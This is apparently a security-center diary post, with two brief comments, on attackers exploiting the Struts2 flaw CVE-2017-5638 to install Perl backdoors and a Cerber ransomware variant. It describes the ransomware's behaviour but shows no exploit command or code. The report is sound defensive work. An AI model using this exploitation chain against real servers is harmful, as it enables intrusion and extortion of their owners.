[We do have a special webcast about the Struts2 Vulnerability scheduled for 11am ET today. Sign up here] Since about a month, we are tracking numerous attempts to exploit the Java Struts2 vulnerability (CVE-2017-5638). Typically, the exploits targeted Unix systems with simple Perl backdoors and bots. But recently, I saw a number of exploit attempts targeting Windows systems using a variant of the Cerber ransomware.
The command executed by the exploit as shown above:
Virustotal shows pretty good coverage for this malware by now: The malware reaches out to btc.blockr.io to retrieve a bitcoin wallet address for the money transfer. Encrypted files are renamed using random (encrypted) file names.
--- |
Johannes 4509 Posts ISC Handler Apr 6th 2017 |
Thread locked Subscribe |
Apr 6th 2017 5 years ago |
Quote: As usual, pretty harmless! Only Windows administrators who still have not employed whitelisting (for example using Software Restriction Policies, available in ALL editions of Windows XP and later versions) to deny execution in %USERPROFILE% (and all other locations unprivileged users can write too) put their users at trivially avoidable risk. |
Anonymous |
Quote |
Apr 6th 2017 5 years ago |
Sign Up for Free or Log In to start participating in the conversation!